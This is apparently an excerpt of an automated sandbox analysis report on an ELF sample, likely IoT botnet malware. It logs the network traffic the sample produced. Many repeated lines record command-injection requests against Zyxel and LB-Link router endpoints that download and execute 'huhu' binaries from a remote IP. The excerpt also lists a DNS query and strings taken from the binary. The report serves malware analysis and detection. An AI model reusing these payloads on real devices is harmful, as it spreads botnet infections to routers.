            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 689X-Iinfo: 14-140205856-0 0NNN RT(1705681771440 2) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 34 2d 31 34 30 32 30 35 38 35 36 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 35 36 38 31 37 37 31 34 34 30 25 32 30 32 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 36 36 38 32 37 36 31 36 36 36 35 30 33 30 34 37 38 32 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 36 36 38 32 37 36 31 36 36 36 35 30 33 30 34 37 38 32 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=14-140205856-0%200NNN%20RT%281705681771440%202%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-668276166650304782&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-668276166650304782</iframe></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Fri, 19 Jan 2024 19:29:18 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
            Source: huhu.arm7.elfString found in binary or memory: http://103.245.236.146/huhu.mips;$
            Source: huhu.arm7.elfString found in binary or memory: http://103.245.236.146/huhu.mpsl;
            Source: huhu.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: huhu.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
